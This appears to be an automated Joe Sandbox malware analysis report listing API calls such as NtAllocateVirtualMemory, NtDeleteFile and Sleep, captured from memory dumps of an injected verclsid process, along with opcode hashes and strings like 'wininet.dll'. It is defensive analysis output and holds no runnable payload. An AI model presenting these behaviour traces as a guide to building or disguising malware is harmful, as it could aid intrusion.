                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: 1b72726ad5e53812508e8f97e74b4d9af357949170d0e60f3a87850d58f1a0e3
                                                                                                                                              • Instruction ID: 498f67eef12b8aa764c906c1503c00ed3080ecccb607386a92ccded984321378
                                                                                                                                              • Opcode Fuzzy Hash: 1b72726ad5e53812508e8f97e74b4d9af357949170d0e60f3a87850d58f1a0e3
                                                                                                                                              • Instruction Fuzzy Hash: 6C31C4B5A00208AFDB14DF98D841EEFB7B9EF88314F108219F919AB344D774A911CFA5
                                                                                                                                              APIs
                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(EA1C6576,?,02EC7EBF,00000000,00000004,00003000,?,?,?,?,?,02EC7EBF,02EB1C3E), ref: 02EC94B8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                              • Opcode ID: 94d26d4b1facfa4accc8706993e449ba619a0b1c9fa88c04f64456cc40328c80
                                                                                                                                              • Instruction ID: bec51cee29d40215de4192eaecc427a677ea8a81d2c22360997c59ed94f7385a
                                                                                                                                              • Opcode Fuzzy Hash: 94d26d4b1facfa4accc8706993e449ba619a0b1c9fa88c04f64456cc40328c80
                                                                                                                                              • Instruction Fuzzy Hash: C921F7B5A00208ABDB14DF98C841FAFB7B9EB88304F108219F918AB240D774A911CFA5
                                                                                                                                              APIs
                                                                                                                                              • NtDeleteFile.NTDLL(EA1C6576), ref: 02EC9286
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4033686569-0
                                                                                                                                              • Opcode ID: 97c73d4813665a42643c06377cd8bce0ca9e2563b00c33c67a044921d853c8aa
                                                                                                                                              • Instruction ID: 79dff539d31df4af6dea4ca5be7fab89b3e11f9b5aaf03e199f9abf2548bdd8b
                                                                                                                                              • Opcode Fuzzy Hash: 97c73d4813665a42643c06377cd8bce0ca9e2563b00c33c67a044921d853c8aa
                                                                                                                                              • Instruction Fuzzy Hash: 5A1151759406086FD620EAA8DC01FEF776DEB85715F10C24DF9586B280E77479028FA5
                                                                                                                                              APIs
                                                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EC92C4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                              • Opcode ID: 13aea458c4dd10709b068c53b11a86730bd5b72ae72742d61fe1a6e295c2ee1f
                                                                                                                                              • Instruction ID: c020b54524ee68c64c33c0c5c73ef89d6acf6b7fd2e39ec286665d53b62494b7
                                                                                                                                              • Opcode Fuzzy Hash: 13aea458c4dd10709b068c53b11a86730bd5b72ae72742d61fe1a6e295c2ee1f
                                                                                                                                              • Instruction Fuzzy Hash: D4E046362506587BD220AA59DC04F9B77ADEBC5724F008059FA08AB241C6B1B9018AE4
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 4527b5afe9b6be1aa784b84ddcaa3ee7a0869e3bed80dd52f06b41c57205a350
                                                                                                                                              • Instruction ID: dff3fb2b33e0c4c80d1e2d26853657a195898daa5916a80f96c9e03a3f814367
                                                                                                                                              • Opcode Fuzzy Hash: 4527b5afe9b6be1aa784b84ddcaa3ee7a0869e3bed80dd52f06b41c57205a350
                                                                                                                                              • Instruction Fuzzy Hash: 489002616419009261407158880440660059BE13453D5C115A05555A4C8618D956A26A
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: af147c11dcedf46a6eee9fa763e39c4eeaceabb74a4cadb3a1a87875443ec53d
                                                                                                                                              • Instruction ID: 988399128c0f669f611da358a6b41e2da54fddf7a4260f3b3176a3eb732d306c
                                                                                                                                              • Opcode Fuzzy Hash: af147c11dcedf46a6eee9fa763e39c4eeaceabb74a4cadb3a1a87875443ec53d
                                                                                                                                              • Instruction Fuzzy Hash: 40900231645C0062B1407158888454640059BE0345B95C011E0425598C8A14DA576362
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 916b2e0da34269bf9ad8b5cce5e9f49ff89ddc0437c38d777c064cfbbccdc47b
                                                                                                                                              • Instruction ID: aa27e149d7653123fea9549d2a3eff3c97def3c8c010d5a892ead6d9c92b5211
                                                                                                                                              • Opcode Fuzzy Hash: 916b2e0da34269bf9ad8b5cce5e9f49ff89ddc0437c38d777c064cfbbccdc47b
                                                                                                                                              • Instruction Fuzzy Hash: F990023124180892F10071588404B4600058BE0345F95C016A0125698D8615D9527522
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 2420bbe6c18e1bccd5296910bc7184d03612ee5837d3352dd9160fbb3e62f386
                                                                                                                                              • Instruction ID: b29eb6d2b8598f7a4c5381817c7a0337b52d60963a83f3f5f4843814decbaf23
                                                                                                                                              • Opcode Fuzzy Hash: 2420bbe6c18e1bccd5296910bc7184d03612ee5837d3352dd9160fbb3e62f386
                                                                                                                                              • Instruction Fuzzy Hash: 5E90023124188852F1107158C40474A00058BD0345F99C411A442569CD8695D9927122
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: fed0060fac1714d197bf619b2342585e35d408614e758cb32da20e9fc87ec49f
                                                                                                                                              • Instruction ID: 833f07d2ec27d46e2c751d486ad8a313dc4715fbee5d20fd726ea2227c79eb70
                                                                                                                                              • Opcode Fuzzy Hash: fed0060fac1714d197bf619b2342585e35d408614e758cb32da20e9fc87ec49f
                                                                                                                                              • Instruction Fuzzy Hash: EB90023124180463F1117158850470700098BD0285FD5C412A042559CD9656DA53B122
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: f16c483fb3263deae83f23893e59eac913782dc23dd038a2d241ef8c68e5b52e
                                                                                                                                              • Instruction ID: a91d13dddc444b3718829a0ec1298c6a1e68baffb3acc8c8dd2f15bf3082bf30
                                                                                                                                              • Opcode Fuzzy Hash: f16c483fb3263deae83f23893e59eac913782dc23dd038a2d241ef8c68e5b52e
                                                                                                                                              • Instruction Fuzzy Hash: 71900221282841A27545B158840450740069BE02857D5C012A1415994C8526E957E622
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: fba1e7c2ab9e48086d11f335bf0b35ac4ba1caf96e5a3c949fa5ad242fba153b
                                                                                                                                              • Instruction ID: 592b260fb9ee7d3d023c0b28fb45faf2d53df918f3053d45a75182cfb5cf0fe3
                                                                                                                                              • Opcode Fuzzy Hash: fba1e7c2ab9e48086d11f335bf0b35ac4ba1caf96e5a3c949fa5ad242fba153b
                                                                                                                                              • Instruction Fuzzy Hash: 3590022134180053F140715894186064005DBE1345F95D011E0415598CD915D9576223
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 3e464bc39e2f2821cb9247d6b6b2fd1c13442ff37d280e13fc211fb3c8b4ffd6
                                                                                                                                              • Instruction ID: 249c0f419da5b5d7afab018a727d6327e47d428990b5851c46f7e309492acf04
                                                                                                                                              • Opcode Fuzzy Hash: 3e464bc39e2f2821cb9247d6b6b2fd1c13442ff37d280e13fc211fb3c8b4ffd6
                                                                                                                                              • Instruction Fuzzy Hash: 6F90022925380052F1807158940860A00058BD1246FD5D415A001659CCC915D96A6322
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: f08fb4be524f306772e9e0e0a958f3d0967a6d9258ecf80498bdcd3c7bb027df
                                                                                                                                              • Instruction ID: d28f5bb73f0bc9e5ad960aa79bcb5657031403cb3005266b8609d2027aca358b
                                                                                                                                              • Opcode Fuzzy Hash: f08fb4be524f306772e9e0e0a958f3d0967a6d9258ecf80498bdcd3c7bb027df
                                                                                                                                              • Instruction Fuzzy Hash: 8E900261241C0453F1407558880460700058BD0346F95C011A2065599E8A29DD527136
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: a33cdc82ff1302f1236be7eae70231aff7fdc5985e0c9738be4ee1b47354f134
                                                                                                                                              • Instruction ID: 0acc422a74b4ee27bed3b940cb40a92f327600edff4bd5d523d5849b54952fd7
                                                                                                                                              • Opcode Fuzzy Hash: a33cdc82ff1302f1236be7eae70231aff7fdc5985e0c9738be4ee1b47354f134
                                                                                                                                              • Instruction Fuzzy Hash: 1390022164180552F10171588404616000A8BD0285FD5C022A1025599ECA25DA93B132
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 44a902952ea711913156025c41c063c09b9f6302ff56794e1f7ee0477dd3fcb8
                                                                                                                                              • Instruction ID: 27d5dee5dafa511f28399da611b0a9da5ac5ab914384292b33e7efd74bd29512
                                                                                                                                              • Opcode Fuzzy Hash: 44a902952ea711913156025c41c063c09b9f6302ff56794e1f7ee0477dd3fcb8
                                                                                                                                              • Instruction Fuzzy Hash: 6F900221251C0092F20075688C14B0700058BD0347F95C115A0155598CC915D9626522
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02EC3A4B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                              • String ID: @J7<
                                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeUninitialize
